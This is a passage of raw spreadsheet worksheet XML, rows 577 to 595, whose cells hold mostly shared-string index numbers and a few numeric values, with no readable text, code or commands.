    <row r="577" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A577" s="12">
        <v>2496</v>
      </c>
      <c r="B577" s="12" t="s">
        <v>28356</v>
      </c>
      <c r="C577" s="12" t="s">
        <v>28361</v>
      </c>
      <c r="D577" s="12" t="s">
        <v>28348</v>
      </c>
      <c r="E577" s="12" t="s">
        <v>31442</v>
      </c>
      <c r="F577" s="12" t="s">
        <v>29761</v>
      </c>
      <c r="G577" s="12" t="s">
        <v>4438</v>
      </c>
      <c r="H577" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I577" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J577" s="12" t="s">
        <v>65</v>
      </c>
      <c r="K577" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L577" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M577" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N577" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O577" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P577" s="12" t="s">
        <v>3391</v>
      </c>
      <c r="Q577" s="12">
        <v>2.6</v>
      </c>
      <c r="R577" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S577" s="12" t="s">
        <v>4439</v>
      </c>
      <c r="T577" s="12" t="s">
        <v>4440</v>
      </c>
      <c r="U577" s="12" t="s">
        <v>4441</v>
      </c>
      <c r="V577" s="12" t="s">
        <v>70</v>
      </c>
      <c r="W577" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X577" s="12">
        <v>5</v>
      </c>
      <c r="Y577" s="12" t="s">
        <v>4442</v>
      </c>
    </row>
    <row r="578" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A578" s="12">
        <v>2497</v>
      </c>
      <c r="B578" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D578" s="12" t="s">
        <v>28826</v>
      </c>
      <c r="E578" s="12" t="s">
        <v>31442</v>
      </c>
      <c r="F578" s="12" t="s">
        <v>29761</v>
      </c>
      <c r="G578" s="12" t="s">
        <v>4443</v>
      </c>
      <c r="H578" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I578" s="12" t="s">
        <v>22</v>
      </c>
      <c r="J578" s="12" t="s">
        <v>23</v>
      </c>
      <c r="K578" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L578" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M578" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N578" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O578" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P578" s="12" t="s">
        <v>3391</v>
      </c>
      <c r="Q578" s="12">
        <v>2.6</v>
      </c>
      <c r="R578" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S578" s="12" t="s">
        <v>4444</v>
      </c>
      <c r="T578" s="12" t="s">
        <v>4445</v>
      </c>
      <c r="U578" s="12" t="s">
        <v>4446</v>
      </c>
      <c r="V578" s="12" t="s">
        <v>3738</v>
      </c>
      <c r="W578" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X578" s="12">
        <v>3</v>
      </c>
      <c r="Y578" s="12" t="s">
        <v>4447</v>
      </c>
    </row>
    <row r="579" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A579" s="12">
        <v>2501</v>
      </c>
      <c r="B579" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D579" s="12" t="s">
        <v>28829</v>
      </c>
      <c r="F579" s="12" t="s">
        <v>29761</v>
      </c>
      <c r="G579" s="12" t="s">
        <v>4448</v>
      </c>
      <c r="H579" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I579" s="12" t="s">
        <v>51</v>
      </c>
      <c r="J579" s="12" t="s">
        <v>347</v>
      </c>
      <c r="K579" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L579" s="12" t="s">
        <v>33</v>
      </c>
      <c r="M579" s="12" t="s">
        <v>31585</v>
      </c>
      <c r="N579" s="12" t="s">
        <v>31595</v>
      </c>
      <c r="O579" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P579" s="12" t="s">
        <v>4449</v>
      </c>
      <c r="Q579" s="12">
        <v>2.6</v>
      </c>
      <c r="R579" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S579" s="12" t="s">
        <v>4450</v>
      </c>
      <c r="T579" s="12" t="s">
        <v>4451</v>
      </c>
      <c r="U579" s="12" t="s">
        <v>4452</v>
      </c>
      <c r="V579" s="12" t="s">
        <v>57</v>
      </c>
      <c r="W579" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X579" s="12">
        <v>7</v>
      </c>
      <c r="Y579" s="12" t="s">
        <v>4453</v>
      </c>
    </row>
    <row r="580" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A580" s="12">
        <v>2517</v>
      </c>
      <c r="B580" s="12" t="s">
        <v>28831</v>
      </c>
      <c r="D580" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F580" s="12" t="s">
        <v>29760</v>
      </c>
      <c r="G580" s="12" t="s">
        <v>4464</v>
      </c>
      <c r="H580" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I580" s="12" t="s">
        <v>22</v>
      </c>
      <c r="J580" s="12" t="s">
        <v>270</v>
      </c>
      <c r="K580" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L580" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M580" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N580" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O580" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P580" s="12" t="s">
        <v>4465</v>
      </c>
      <c r="Q580" s="12">
        <v>2.4</v>
      </c>
      <c r="R580" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S580" s="12" t="s">
        <v>4466</v>
      </c>
      <c r="T580" s="12" t="s">
        <v>4467</v>
      </c>
      <c r="U580" s="12" t="s">
        <v>4468</v>
      </c>
      <c r="V580" s="12" t="s">
        <v>274</v>
      </c>
      <c r="W580" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X580" s="12">
        <v>4</v>
      </c>
      <c r="Y580" s="12" t="s">
        <v>4469</v>
      </c>
    </row>
    <row r="581" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A581" s="12">
        <v>2520</v>
      </c>
      <c r="B581" s="12" t="s">
        <v>28824</v>
      </c>
      <c r="D581" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E581" s="12" t="s">
        <v>31425</v>
      </c>
      <c r="F581" s="12" t="s">
        <v>29761</v>
      </c>
      <c r="G581" s="12" t="s">
        <v>4470</v>
      </c>
      <c r="H581" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I581" s="12" t="s">
        <v>51</v>
      </c>
      <c r="J581" s="12" t="s">
        <v>52</v>
      </c>
      <c r="K581" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L581" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M581" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N581" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O581" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P581" s="12" t="s">
        <v>3391</v>
      </c>
      <c r="Q581" s="12">
        <v>2.6</v>
      </c>
      <c r="R581" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S581" s="12" t="s">
        <v>4471</v>
      </c>
      <c r="T581" s="12" t="s">
        <v>57</v>
      </c>
      <c r="U581" s="12" t="s">
        <v>4472</v>
      </c>
      <c r="V581" s="12" t="s">
        <v>57</v>
      </c>
      <c r="W581" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X581" s="12">
        <v>2</v>
      </c>
      <c r="Y581" s="12" t="s">
        <v>4473</v>
      </c>
    </row>
    <row r="582" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A582" s="12">
        <v>2522</v>
      </c>
      <c r="B582" s="12" t="s">
        <v>28832</v>
      </c>
      <c r="C582" s="12" t="s">
        <v>28833</v>
      </c>
      <c r="D582" s="12" t="s">
        <v>28834</v>
      </c>
      <c r="F582" s="12" t="s">
        <v>29760</v>
      </c>
      <c r="G582" s="12" t="s">
        <v>4474</v>
      </c>
      <c r="H582" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I582" s="12" t="s">
        <v>22</v>
      </c>
      <c r="J582" s="12" t="s">
        <v>23</v>
      </c>
      <c r="K582" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L582" s="12" t="s">
        <v>53</v>
      </c>
      <c r="M582" s="12" t="s">
        <v>31583</v>
      </c>
      <c r="N582" s="12" t="s">
        <v>31596</v>
      </c>
      <c r="O582" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P582" s="12" t="s">
        <v>3391</v>
      </c>
      <c r="Q582" s="12">
        <v>2.6</v>
      </c>
      <c r="R582" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S582" s="12" t="s">
        <v>4475</v>
      </c>
      <c r="T582" s="12" t="s">
        <v>4476</v>
      </c>
      <c r="U582" s="12" t="s">
        <v>4477</v>
      </c>
      <c r="V582" s="12" t="s">
        <v>608</v>
      </c>
      <c r="W582" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X582" s="12">
        <v>9</v>
      </c>
      <c r="Y582" s="12" t="s">
        <v>4478</v>
      </c>
    </row>
    <row r="583" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A583" s="12">
        <v>2538</v>
      </c>
      <c r="B583" s="12" t="s">
        <v>28835</v>
      </c>
      <c r="D583" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F583" s="12" t="s">
        <v>29761</v>
      </c>
      <c r="G583" s="12" t="s">
        <v>4486</v>
      </c>
      <c r="H583" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I583" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J583" s="12" t="s">
        <v>96</v>
      </c>
      <c r="K583" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L583" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M583" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N583" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O583" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P583" s="12" t="s">
        <v>4487</v>
      </c>
      <c r="Q583" s="12">
        <v>2.6</v>
      </c>
      <c r="R583" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S583" s="12" t="s">
        <v>4488</v>
      </c>
      <c r="T583" s="12" t="s">
        <v>4489</v>
      </c>
      <c r="U583" s="12" t="s">
        <v>4490</v>
      </c>
      <c r="V583" s="12" t="s">
        <v>1923</v>
      </c>
      <c r="W583" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X583" s="12">
        <v>2</v>
      </c>
      <c r="Y583" s="12" t="s">
        <v>4491</v>
      </c>
    </row>
    <row r="584" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A584" s="12">
        <v>2540</v>
      </c>
      <c r="B584" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D584" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E584" s="12" t="s">
        <v>31439</v>
      </c>
      <c r="F584" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G584" s="12" t="s">
        <v>4492</v>
      </c>
      <c r="H584" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I584" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J584" s="12" t="s">
        <v>591</v>
      </c>
      <c r="K584" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L584" s="12" t="s">
        <v>53</v>
      </c>
      <c r="M584" s="12" t="s">
        <v>31583</v>
      </c>
      <c r="N584" s="12" t="s">
        <v>31596</v>
      </c>
      <c r="O584" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P584" s="12" t="s">
        <v>3391</v>
      </c>
      <c r="Q584" s="12">
        <v>2.6</v>
      </c>
      <c r="R584" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S584" s="12" t="s">
        <v>4493</v>
      </c>
      <c r="T584" s="12" t="s">
        <v>4494</v>
      </c>
      <c r="U584" s="12" t="s">
        <v>4495</v>
      </c>
      <c r="V584" s="12" t="s">
        <v>4496</v>
      </c>
      <c r="W584" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X584" s="12">
        <v>13</v>
      </c>
      <c r="Y584" s="12" t="s">
        <v>4497</v>
      </c>
    </row>
    <row r="585" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A585" s="12">
        <v>2553</v>
      </c>
      <c r="B585" s="12" t="s">
        <v>28390</v>
      </c>
      <c r="C585" s="12" t="s">
        <v>28837</v>
      </c>
      <c r="D585" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F585" s="12" t="s">
        <v>29761</v>
      </c>
      <c r="G585" s="12" t="s">
        <v>4503</v>
      </c>
      <c r="H585" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I585" s="12" t="s">
        <v>22</v>
      </c>
      <c r="J585" s="12" t="s">
        <v>23</v>
      </c>
      <c r="K585" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L585" s="12" t="s">
        <v>33</v>
      </c>
      <c r="M585" s="12" t="s">
        <v>31585</v>
      </c>
      <c r="N585" s="12" t="s">
        <v>31595</v>
      </c>
      <c r="O585" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P585" s="12" t="s">
        <v>4498</v>
      </c>
      <c r="Q585" s="12">
        <v>2.6</v>
      </c>
      <c r="R585" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S585" s="12" t="s">
        <v>4504</v>
      </c>
      <c r="T585" s="12" t="s">
        <v>4500</v>
      </c>
      <c r="U585" s="12" t="s">
        <v>4505</v>
      </c>
      <c r="V585" s="12" t="s">
        <v>608</v>
      </c>
      <c r="W585" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X585" s="12">
        <v>1</v>
      </c>
      <c r="Y585" s="12" t="s">
        <v>4506</v>
      </c>
    </row>
    <row r="586" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A586" s="12">
        <v>2560</v>
      </c>
      <c r="B586" s="12" t="s">
        <v>28817</v>
      </c>
      <c r="C586" s="12" t="s">
        <v>28838</v>
      </c>
      <c r="D586" s="12" t="s">
        <v>28830</v>
      </c>
      <c r="E586" s="12" t="s">
        <v>31451</v>
      </c>
      <c r="F586" s="12" t="s">
        <v>29761</v>
      </c>
      <c r="G586" s="12" t="s">
        <v>4507</v>
      </c>
      <c r="H586" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I586" s="12" t="s">
        <v>51</v>
      </c>
      <c r="J586" s="12" t="s">
        <v>201</v>
      </c>
      <c r="K586" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L586" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M586" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N586" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O586" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P586" s="12" t="s">
        <v>3391</v>
      </c>
      <c r="Q586" s="12">
        <v>2.6</v>
      </c>
      <c r="R586" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S586" s="12" t="s">
        <v>4508</v>
      </c>
      <c r="T586" s="12" t="s">
        <v>2391</v>
      </c>
      <c r="U586" s="12" t="s">
        <v>4509</v>
      </c>
      <c r="V586" s="12" t="s">
        <v>4176</v>
      </c>
      <c r="W586" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X586" s="12">
        <v>19</v>
      </c>
      <c r="Y586" s="12" t="s">
        <v>4510</v>
      </c>
    </row>
    <row r="587" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A587" s="12">
        <v>2567</v>
      </c>
      <c r="B587" s="12" t="s">
        <v>29779</v>
      </c>
      <c r="C587" s="12" t="s">
        <v>28466</v>
      </c>
      <c r="D587" s="12" t="s">
        <v>28839</v>
      </c>
      <c r="E587" s="12" t="s">
        <v>31442</v>
      </c>
      <c r="F587" s="12" t="s">
        <v>29761</v>
      </c>
      <c r="G587" s="12" t="s">
        <v>4515</v>
      </c>
      <c r="H587" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I587" s="12" t="s">
        <v>51</v>
      </c>
      <c r="J587" s="12" t="s">
        <v>52</v>
      </c>
      <c r="K587" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L587" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M587" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N587" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O587" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P587" s="12" t="s">
        <v>4516</v>
      </c>
      <c r="Q587" s="12">
        <v>2.4</v>
      </c>
      <c r="R587" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S587" s="12" t="s">
        <v>4517</v>
      </c>
      <c r="T587" s="12" t="s">
        <v>4518</v>
      </c>
      <c r="U587" s="12" t="s">
        <v>4513</v>
      </c>
      <c r="V587" s="12" t="s">
        <v>57</v>
      </c>
      <c r="W587" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X587" s="12">
        <v>19</v>
      </c>
      <c r="Y587" s="12" t="s">
        <v>4519</v>
      </c>
    </row>
    <row r="588" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A588" s="12">
        <v>2569</v>
      </c>
      <c r="B588" s="12" t="s">
        <v>28390</v>
      </c>
      <c r="C588" s="12" t="s">
        <v>28840</v>
      </c>
      <c r="D588" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F588" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G588" s="12" t="s">
        <v>4520</v>
      </c>
      <c r="H588" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I588" s="12" t="s">
        <v>13</v>
      </c>
      <c r="J588" s="12" t="s">
        <v>14</v>
      </c>
      <c r="K588" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L588" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M588" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N588" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O588" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P588" s="12" t="s">
        <v>4521</v>
      </c>
      <c r="Q588" s="12">
        <v>2.6</v>
      </c>
      <c r="R588" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S588" s="12" t="s">
        <v>4522</v>
      </c>
      <c r="T588" s="12" t="s">
        <v>3949</v>
      </c>
      <c r="U588" s="12" t="s">
        <v>4523</v>
      </c>
      <c r="V588" s="12" t="s">
        <v>1472</v>
      </c>
      <c r="W588" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X588" s="12">
        <v>6</v>
      </c>
      <c r="Y588" s="12" t="s">
        <v>4524</v>
      </c>
    </row>
    <row r="589" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A589" s="12">
        <v>2574</v>
      </c>
      <c r="B589" s="12" t="s">
        <v>28390</v>
      </c>
      <c r="C589" s="12" t="s">
        <v>28466</v>
      </c>
      <c r="D589" s="12" t="s">
        <v>28830</v>
      </c>
      <c r="E589" s="12" t="s">
        <v>31442</v>
      </c>
      <c r="F589" s="12" t="s">
        <v>29761</v>
      </c>
      <c r="G589" s="12" t="s">
        <v>4525</v>
      </c>
      <c r="H589" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I589" s="12" t="s">
        <v>51</v>
      </c>
      <c r="J589" s="12" t="s">
        <v>52</v>
      </c>
      <c r="K589" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L589" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M589" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N589" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O589" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P589" s="12" t="s">
        <v>3391</v>
      </c>
      <c r="Q589" s="12">
        <v>2.6</v>
      </c>
      <c r="R589" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S589" s="12" t="s">
        <v>4526</v>
      </c>
      <c r="T589" s="12" t="s">
        <v>4527</v>
      </c>
      <c r="U589" s="12" t="s">
        <v>4528</v>
      </c>
      <c r="V589" s="12" t="s">
        <v>57</v>
      </c>
      <c r="W589" s="12" t="s">
        <v>4529</v>
      </c>
      <c r="X589" s="12">
        <v>39</v>
      </c>
      <c r="Y589" s="12" t="s">
        <v>4530</v>
      </c>
    </row>
    <row r="590" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A590" s="12">
        <v>2588</v>
      </c>
      <c r="B590" s="12" t="s">
        <v>28841</v>
      </c>
      <c r="D590" s="12" t="s">
        <v>28842</v>
      </c>
      <c r="E590" s="12" t="s">
        <v>31442</v>
      </c>
      <c r="F590" s="12" t="s">
        <v>29761</v>
      </c>
      <c r="G590" s="12" t="s">
        <v>4535</v>
      </c>
      <c r="H590" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I590" s="12" t="s">
        <v>51</v>
      </c>
      <c r="J590" s="12" t="s">
        <v>754</v>
      </c>
      <c r="K590" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L590" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M590" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N590" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O590" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P590" s="12" t="s">
        <v>4536</v>
      </c>
      <c r="Q590" s="12">
        <v>2.6</v>
      </c>
      <c r="R590" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S590" s="12" t="s">
        <v>4537</v>
      </c>
      <c r="T590" s="12" t="s">
        <v>4538</v>
      </c>
      <c r="U590" s="12" t="s">
        <v>4539</v>
      </c>
      <c r="V590" s="12" t="s">
        <v>4540</v>
      </c>
      <c r="W590" s="12">
        <v>2074</v>
      </c>
      <c r="X590" s="12">
        <v>13</v>
      </c>
      <c r="Y590" s="12" t="s">
        <v>4541</v>
      </c>
    </row>
    <row r="591" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A591" s="12">
        <v>2609</v>
      </c>
      <c r="B591" s="12" t="s">
        <v>28843</v>
      </c>
      <c r="C591" s="12" t="s">
        <v>28844</v>
      </c>
      <c r="D591" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F591" s="12" t="s">
        <v>29761</v>
      </c>
      <c r="G591" s="12" t="s">
        <v>4547</v>
      </c>
      <c r="H591" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I591" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J591" s="12" t="s">
        <v>128</v>
      </c>
      <c r="K591" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L591" s="12" t="s">
        <v>53</v>
      </c>
      <c r="M591" s="12" t="s">
        <v>31583</v>
      </c>
      <c r="N591" s="12" t="s">
        <v>31596</v>
      </c>
      <c r="O591" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P591" s="12" t="s">
        <v>4548</v>
      </c>
      <c r="Q591" s="12">
        <v>2.6</v>
      </c>
      <c r="R591" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S591" s="12" t="s">
        <v>4549</v>
      </c>
      <c r="T591" s="12" t="s">
        <v>4550</v>
      </c>
      <c r="U591" s="12" t="s">
        <v>4551</v>
      </c>
      <c r="V591" s="12" t="s">
        <v>2992</v>
      </c>
      <c r="W591" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X591" s="12">
        <v>4</v>
      </c>
      <c r="Y591" s="12" t="s">
        <v>4552</v>
      </c>
    </row>
    <row r="592" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A592" s="12">
        <v>2612</v>
      </c>
      <c r="B592" s="12" t="s">
        <v>28377</v>
      </c>
      <c r="D592" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F592" s="12" t="s">
        <v>29761</v>
      </c>
      <c r="G592" s="12" t="s">
        <v>4553</v>
      </c>
      <c r="H592" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I592" s="12" t="s">
        <v>111</v>
      </c>
      <c r="J592" s="12" t="s">
        <v>28</v>
      </c>
      <c r="K592" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L592" s="12" t="s">
        <v>53</v>
      </c>
      <c r="M592" s="12" t="s">
        <v>31583</v>
      </c>
      <c r="N592" s="12" t="s">
        <v>31596</v>
      </c>
      <c r="O592" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P592" s="12" t="s">
        <v>4554</v>
      </c>
      <c r="Q592" s="12">
        <v>2.6</v>
      </c>
      <c r="R592" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S592" s="12" t="s">
        <v>4555</v>
      </c>
      <c r="T592" s="12" t="s">
        <v>4556</v>
      </c>
      <c r="U592" s="12" t="s">
        <v>4557</v>
      </c>
      <c r="V592" s="12" t="s">
        <v>323</v>
      </c>
      <c r="W592" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X592" s="12">
        <v>2</v>
      </c>
      <c r="Y592" s="12" t="s">
        <v>4558</v>
      </c>
    </row>
    <row r="593" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A593" s="12">
        <v>2636</v>
      </c>
      <c r="B593" s="12" t="s">
        <v>28259</v>
      </c>
      <c r="C593" s="12" t="s">
        <v>28260</v>
      </c>
      <c r="D593" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F593" s="12" t="s">
        <v>29761</v>
      </c>
      <c r="G593" s="12" t="s">
        <v>4578</v>
      </c>
      <c r="H593" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I593" s="12" t="s">
        <v>13</v>
      </c>
      <c r="J593" s="12" t="s">
        <v>28</v>
      </c>
      <c r="K593" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L593" s="12" t="s">
        <v>33</v>
      </c>
      <c r="M593" s="12" t="s">
        <v>31585</v>
      </c>
      <c r="N593" s="12" t="s">
        <v>31595</v>
      </c>
      <c r="O593" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P593" s="12" t="s">
        <v>3391</v>
      </c>
      <c r="Q593" s="12">
        <v>2.6</v>
      </c>
      <c r="R593" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S593" s="12" t="s">
        <v>4579</v>
      </c>
      <c r="T593" s="12" t="s">
        <v>4580</v>
      </c>
      <c r="U593" s="12" t="s">
        <v>4581</v>
      </c>
      <c r="V593" s="12" t="s">
        <v>222</v>
      </c>
      <c r="W593" s="12">
        <v>4703</v>
      </c>
      <c r="X593" s="12">
        <v>18</v>
      </c>
      <c r="Y593" s="12" t="s">
        <v>4582</v>
      </c>
    </row>
    <row r="594" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A594" s="12">
        <v>2638</v>
      </c>
      <c r="B594" s="12" t="s">
        <v>28845</v>
      </c>
      <c r="D594" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E594" s="12" t="s">
        <v>31468</v>
      </c>
      <c r="F594" s="12" t="s">
        <v>29761</v>
      </c>
      <c r="G594" s="12" t="s">
        <v>4583</v>
      </c>
      <c r="H594" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I594" s="12" t="s">
        <v>51</v>
      </c>
      <c r="J594" s="12" t="s">
        <v>28</v>
      </c>
      <c r="K594" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L594" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M594" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N594" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O594" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P594" s="12" t="s">
        <v>4487</v>
      </c>
      <c r="Q594" s="12">
        <v>2.6</v>
      </c>
      <c r="R594" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S594" s="12" t="s">
        <v>4584</v>
      </c>
      <c r="T594" s="12" t="s">
        <v>3538</v>
      </c>
      <c r="U594" s="12" t="s">
        <v>4585</v>
      </c>
      <c r="V594" s="12" t="s">
        <v>3095</v>
      </c>
      <c r="W594" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X594" s="12">
        <v>7</v>
      </c>
      <c r="Y594" s="12" t="s">
        <v>4586</v>
      </c>
    </row>
    <row r="595" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A595" s="12">
        <v>2642</v>
      </c>
      <c r="B595" s="12" t="s">
        <v>28390</v>
      </c>
      <c r="C595" s="12" t="s">
        <v>28391</v>
      </c>
      <c r="D595" s="12" t="s">
        <v>28846</v>
      </c>
      <c r="F595" s="12" t="s">
        <v>29761</v>
      </c>
      <c r="G595" s="12" t="s">
        <v>4587</v>
      </c>
      <c r="H595" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I595" s="12" t="s">
        <v>35</v>
      </c>
      <c r="J595" s="12" t="s">
        <v>1873</v>
      </c>
      <c r="K595" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L595" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M595" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N595" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O595" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P595" s="12" t="s">
        <v>4588</v>
      </c>
      <c r="Q595" s="12">
        <v>2.6</v>
      </c>
      <c r="R595" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S595" s="12" t="s">
        <v>4589</v>
      </c>
      <c r="T595" s="12" t="s">
        <v>4590</v>
      </c>
